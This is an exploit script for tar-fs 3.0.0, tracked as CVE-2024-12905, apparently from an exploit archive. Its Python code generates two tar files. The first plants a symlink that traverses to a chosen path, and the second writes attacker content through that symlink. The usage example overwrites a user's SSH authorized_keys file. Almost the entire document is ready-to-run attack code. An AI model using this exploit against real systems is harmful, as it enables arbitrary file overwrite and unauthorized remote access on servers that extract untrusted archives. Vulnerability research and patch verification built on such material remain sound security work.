# Exploit Title: tar-fs 3.0.0 - Arbitrary File Write/Overwrite # Date: 17th April, 2024 # Exploit Author: Ardayfio Samuel Nii Aryee # Software link: https://github.com/mafintosh/tar-fs # Version: tar-fs 3.0.0 # Tested on: Ubuntu # CVE: CVE-2024-12905 # Run the command: Example: python3 exploit.py authorized_keys ../../../../../../../../home/user1/authorized_keys # This will generate two tar file: stage_1.tar and stage_2.tar # Upload stage_1.tar first to unarchive the symlink # Next, upload stage_2.tar to finally write/overwrite the file on the system import os import sys import tarfile link_name = "normal_file" def check_arguments(): if len(sys.argv) != 3: print(f"Usage: {sys.argv[0]} <path_to_file_contents> <path_to_target_file_to_overwrite>\n\ Example: {sys.argv[0]} authorized_keys ../../../../../../../../home/user1/authorized_keys\ ") sys.exit() content_file_path = sys.argv[1] target_file_path = sys.argv[2] return content_file_path, target_file_path def create_symlink(link_name, target_path): os.symlink(target_path, link_name) print("[+] Created symlink: {link_name} -> {target_path}") def archive_files(archive_name, file_path): tar = tarfile.open(archive_name, 'w') tar.add(file_path, link_name, recursive=False) tar.close() print(f"[+] Archived to: {archive_name}") def main(): content_path, target_file = check_arguments() stage_1_archive_name = "stage_1.tar" stage_2_archive_name = "stage_2.tar" create_symlink(link_name, target_file) archive_files(stage_1_archive_name, link_name) archive_files(stage_2_archive_name, content_path) if __name__ == "__main__": main()